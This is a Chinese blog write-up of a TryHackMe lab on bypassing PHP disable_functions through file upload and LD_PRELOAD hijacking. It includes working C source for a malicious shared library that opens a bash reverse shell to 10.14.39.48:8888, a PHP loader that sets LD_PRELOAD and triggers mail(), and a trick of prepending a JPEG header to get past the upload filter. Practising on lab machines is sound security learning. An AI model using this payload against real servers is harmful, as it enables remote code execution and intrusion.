TryHackMe-Bypass_Disable_Functions

已于 2023-01-15 14:13:09 修改
阅读量371 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: php 任意文件上传 LD_PRELOAD php禁用函数绕过 web安全
于 2023-01-10 17:33:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128633692
版权

Bypass Disable Functions

练习绕过运行操作系统命令或启动进程的禁用危险功能。

  • 通常应用的措施包括禁用可能执行操作系统命令或启动进程的危险功能。像system()或shell_exec()这样的函数通常通过php.ini配置文件中定义的PHP指令来禁用。其他函数,也许不太为人所知的dl()(它允许您动态加载PHP扩展),可能会被系统管理员忽略并且不会被禁用。入侵测试中的通常做法是列出启用的功能,以防忘记任何功能。

  • 最容易实现且不是很普遍的技术之一是滥用 mail() 和 putenv() 功能。这种技术并不新鲜,gat3way 在 2008 年就已经向 PHP 报告了它,但它至今仍然有效。通过 putenv() 函数,我们可以修改环境变量,允许我们将想要的值分配给变量LD_PRELOAD。大致LD_PRELOAD将允许我们在其余库之前预加载 .so 库,这样如果程序使用库的功能(例如 libc.so),它将执行我们库中的函数而不是它应该执行的函数。通过这种方式,我们可以劫持或“钩住”功能,随意修改它们的行为。

┌──(root🐦kali)-[/home/sugobet]
└─# nmap -sS 10.10.130.116
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-10 10:50 CST
Nmap scan report for 10.10.130.116
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

web是一个纯文件上传点,只允许上传图片

经过简单测试,并没有后缀限制,它只检查文件头部信息,甚至没有检查mime类型

gobuster扫:

gobuster dir --url http://10.10.130.116/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

/assets               (Status: 301) [Size: 315] [--> http://10.10.130.116/assets/]
/phpinfo.php          (Status: 200) [Size: 68166]
/uploads              (Status: 301) [Size: 316] [--> http://10.10.130.116/uploads/]

phpinfo.php可以看到:

disable_functions:

exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

阅读 https://github.com/TarlogicSecurity/Chankro 所有代码

我们这里快速构建一个缩水版本,preload.c:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>


__attribute__ ((__constructor__)) void hack(void) {
    unsetenv("LD_PRELOAD");
    system("whoami > /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads/hack.txt");
}

编译:

gcc -shared -fPIC -o ./getshe11.so ./preload.c

建议使用python进行base64编码,使用linux命令你会后悔的

base64:

python3 -c "import base64;print(base64.b64encode(open('./getshe11.so', 'rb').read()))

"

创建payload.php:

<?php
    $hook = '<getshe11.so的base64编码>';
    file_put_contents('/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads/getshe11.so', base64_decode($hook));
    putenv('LD_PRELOAD=/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads/getshe11.so');

    mail('','','','');
?>

寻找一张正常的图片,与该php文件进行拼接:

cat ./offensivepentesting.jpg ./getshe11.php  >> ./hack.php

上传hack.php并从uploads访问

理论上来讲这样,我们的so文件理应被执行,但是我折腾了很久,也没能reverseshell,so貌似执行出错或失败。

最后即使我完全使用github的那个工具来利用该漏洞,so文件依然执行失败,我不太清楚是什么原因,至少我认为我的操作应该没有什么问题,毕竟也是按照那个工具以及相关的思路来进行的。

我又回来了,经过多次尝试过后,我尝试在/tmp创建文件并写入任意内容,通过php的include函数读取该文件,发现是成功的

我不知道为什么刚刚为什么无法创建文件,但至少现在可以,而且还能getshell

让我们重头来过

preload.c

#include <stdio.h>
#include <unistd.h>
#include <stdio.h>

__attribute__ ((__constructor__)) void hack (void){
    unsetenv("LD_PRELOAD");
    system("echo '#!/bin/bash' > /tmp/fuck.sh");
    system("echo '/bin/bash -i >& /dev/tcp/10.14.39.48/8888 0>&1' >> /tmp/fuck.sh");
    system("sh /tmp/fuck.sh");
    system("bash /tmp/fuck.sh");
    system("zsh /tmp/fuck.sh");
}

是的,我一口气使用了三种终端去执行fuck.sh,因为我也不确定哪个能用

注意:如果你使用刚刚那个github上面的工具去尝试执行shell脚本,那将会失败,因为它的代码编写的不适合我们执行shell脚本:

system(getenv("CHANKRO"));

┌──(root🐦kali)-[/home/sugobet]
└─# ./cmd.sh 
zsh: 权限不够: ./cmd.sh

┌──(root🐦kali)-[/home/sugobet]
└─# sh ./cmd.sh                              
root

所以可能需要进行一些修改以达到 “sh/bash/zsh ./cmd.sh”,而不是像执行可执行文件那样 “./cmd.sh”。

gcc构建动态链接库:

gcc -shared -fPIC -o getshe11.so ./preload.c

可能会弹出一些警告,但都无伤大雅

将getshe11.so进行base64编码,这里我们使用python一句话完成这个操作:

python3 -c "import base64;print(base64.b64encode(open('./getshe11.so', 'rb').read()))"

创建getshe11.php文件:

<?php
    $hook = '<getshe11.so的base64 code>';
    file_put_contents('/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads/getshe11.so', base64_decode($hook));
    putenv('LD_PRELOAD=/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads/getshe11.so');

    mail('','','','');
    error_log('', 1, '', '');
    
    include('/tmp/fuck.sh');
?>

与正常图片拼接:

cat ./offensivepentesting.jpg ./getshe11.php  > ./hack.php

上传hack.php并且在uploads下打开它,我们提前启动nc监听,就能getshell

结束

其实整体并不难,也是比较简单,但是踩了很多坑,然后一直测试一直测试浪费了许多时间,花了半天时间才get到shell

Sugobet
关注
专栏目录
利用PHP扩展模块突破Disable_functions执行命令
09-13
利用PHP扩展模块突破Disable_functions执行命令
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
bypass disable_function绕过
最新发布
banliyaoguai的博客
08-27 1279
php-fpm下的php.ini配置文件中有这个么个字段disable_function,在这个字段中disable_function里面你想要禁用那个命令就把命令写在这里,上面写了system,system就被禁用了,修改完配置文件不要忘记重启服务test.php的文件内容访问test.php的没有反应,这就是system被禁止掉了,已经测试过了在项目中各种函数都可能被禁用(会有一部分项目需要的函数被放通),所以当我们拿webshell缺无法执行命令,下面我们来看一下如何绕过
Bypass disable_function
CN天狼
04-10 2724
Bypass disable_function
bypass disable_function
lonmar的博客
11-26 1005
主要参考https://www.anquanke.com/post/id/208451 0x01 LD_PRELOAD LD_PRELOAD是什么 : 参考 警惕UNIX下的LD_PRELOAD环境变量 https://blog.csdn.net/haoel/article/details/1602108 绕过原理: https://blog.csdn.net/weixin_33738982/article/details/87979967 攻击思路: 1. 有上传权限,上传特定的PHP脚本,hack..
Bypass_Disable_functions_Shell
weixin_33825683的博客
02-18 623
Bypass_Disable_functions_Shell https://github.com/l3m0n/Bypass_Disable_functions_Shell 一个各种方式突破Disable_functions达到命令执行的shell 防御 dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,i...
php马-bypass _ alin'Blog1
08-03
在网络安全领域,Webshell是一种用于远程控制网站服务器的恶意脚本,它允许攻击者在目标服务器上执行系统命令、读取或修改数据。... 0x00 前言 Webshell通常通过利用系统命令执行、代码加载函数或者组合普通函数来...
bypass-paywalls-chrome-master_bypass_sitetemplate_
09-29
Bypass website paywalls
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
NGS-bypas_inject_nexon_bypass_nexongamesecurity_NGS_
09-29
压缩包子文件的文件名称 "NexonGameSecurity-bypass-master" 似乎是一个项目或工具的主目录,可能包含了源代码、文档或者其他资源,用于帮助用户理解和实现绕过Nexon游戏安全系统的操作。"master"可能指的是Git仓库...
PHP通过bypass disable functions执行系统命令的方法汇总
10-18
主要介绍了PHP通过bypass disable functions执行系统命令的方法汇总,需要的朋友可以参考下
PHP Execute Command Bypass Disable_functions
cnbird's blog
11-18 1678
http://zone.wooyun.org/content/16631
无需sendmail:巧用LD_PRELOAD突破disable_functions
weixin_34059951的博客
12-24 165
*本文原创作者:yangyangwithgnu,本文属FreeBuf原创奖励计划,未经许可禁止转载 摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions 禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安装 sendmail,无法执行命令的 webshell 是无意义的,看我如何突破! 半月前逛“已...
开始php脚本,php bypass disable function
weixin_42393261的博客
03-21 477
前言最近开学,事太多了,好久没更新了,然后稍微闲一点一直在弄这个php bypass disable function,一开始自己的电脑win10安装蚁剑的插件,一直报错。怀疑是必须linux环境。下载github上官方源码又显示压缩包有问题,被搞了几天,心态爆炸。今天登github上下载又莫名其妙可以压缩了。装在虚拟机里,总算可以用了。Bypass Disable Functions 专题什么是...
Bypass disable_function【CTFHUB】
D.MIND 的博客
05-12 1475
LD_PRELOAD是Linux下的环境变量 它的本意是,允许程序优先加载指定的动态库。这样能够选择不同的动态库中的相同的函数或者变量。 使用场景是:当使用别人提供的动态库,发现其中某些函数实现不合理。但不能要求别人为你修改源代码并重新生成动态库。在这种情况下,使用LD_PRELOAD可以使用自定义的代码替换别人动态库中的部分代码。 利用环境变量 LD_PRELOAD 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果。 利用条件: 1. 能够上传自己的.so文件 2. 能够控制环境变量
PHP绕过】apache mod_cgi bypass disable_functions
4ut15m's blog
03-10 1469
序 暂时没想到写什么 CGI CGI简单说来便是放在服务器上的可执行程序,CGI编程没有特定的语言,C语言,linux shell,perl,vb等等都可以进行CGI编程. 使用linux shell脚本编写的cgi程序便可以执行系统命令. MOD_CGI 任何具有MIME类型application/x-httpd-cgi或者被cgi-script处理器处理的文件都将被作为CGI脚本对...
bypass disable_function 学习
m0_64180167的博客
10-01 169
我是在做了 buu的 REC ME 来做这个系列所以 LD_PRELOAD 已经有了解了我们来做这个题目通过 request 接受参数 直接传递 然后执行我们首先看看 phpinfo()这里我们看到了 过滤了 mail 和 system题目原本就给了马 我们直接来连接发现被限制了我们通过传递 so 和 php 来劫持环境变量但是这里mail函数禁用我们使用 error_log('',1,'','');我们编写一下hack.so然后还需要php 使用 putenv() 调用so文件。
as_bypass_php_disable_functions-master
09-17
as_bypass_php_disable_functions-master是一个可以绕过PHP禁用函数的项目。 在PHP中,禁用函数是一种安全措施,用于限制脚本执行时可以调用的函数。这样可以防止恶意代码的执行,提高服务器的安全性。 然而,有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值